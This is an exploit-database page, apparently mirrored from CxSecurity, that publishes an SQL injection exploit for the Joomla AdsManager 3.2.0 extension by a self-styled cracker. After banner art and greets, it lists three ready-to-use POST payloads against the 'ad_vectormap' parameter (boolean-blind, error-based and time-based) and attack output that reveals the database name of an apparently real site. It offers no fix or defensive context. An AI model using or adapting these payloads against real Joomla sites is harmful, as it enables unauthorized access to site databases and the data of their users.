Advertisement




Edit Report

Our sensors found this exploit at: https://cxsecurity.com/ascii/WLB-2022090090

Below is a copy:

Joomla AdsManager 3.2.0 SQL Injection
                                     C r a C k E r                                    
                 T H E   C R A C K   O F   E T E R N A L   M I G H T                  


               From The Ashes and Dust Rises An Unimaginable crack....          

                                      [ Exploits ]                                    

:  Author   : CraCkEr                                                                    :
  Website  : extensions.joomla.org                                                      
  Vendor   : JULOA                                                                      
  Software : AdsManager 3.2.0 Extension for Joomla                                      
  Vuln Type: SQL Injection                                                              
  Method   : POST                                                                       
  Impact   : Database Access                                                            
                                                                                        

                              B4nks-NET irc.b4nks.tk #unix                             

:                                                                                        :
  Release Notes:                                                                        
                                                                           
  Typically used for remotely exploitable vulnerabilities that can lead to              
  system compromise                                                                     
                                                                                        
                                                                                        
                                                                                        

                                                                                      


Greets:

    The_PitBull, Raz0r, iNs, SadsouL, His0k4, Hussin X, Mr. SQL   
       
CryptoJob (Twitter) twitter.com/CryptozJob
   

                                     CraCkEr 2022                                    



POST parameter 'ad_vectormap' is vulnerable

---
Parameter: ad_vectormap (POST)
    Type: boolean-based blind
    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BY or GROUP BY clause
    Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') RLIKE (SELECT (CASE WHEN (8892=8892) THEN '' ELSE 0x28 END))-- TnXM&advsearch=0&new_search=1

    Type: error-based
    Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
    Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') AND (SELECT 2373 FROM(SELECT COUNT(*),CONCAT(0x717a706a71,(SELECT (ELT(2373=2373,1))),0x717a627671,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- lAQM&advsearch=0&new_search=1

    Type: time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
    Payload: tsearch=&catid=&ad_price_min=&ad_price_max=&ad_vectormap=') AND (SELECT 4095 FROM (SELECT(SLEEP(5)))TLzG)-- UmxX&advsearch=0&new_search=1
---


[+] Starting the Attack


[INFO] fetching current database

the back-end DBMS is MySQL
web application technology: PHP 7.4.30, Nginx
back-end DBMS: MySQL >= 5.0 (MariaDB fork)

current database: 'c1demosource'



[-] Done

Copyright ©2022 Exploitalert.

All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use.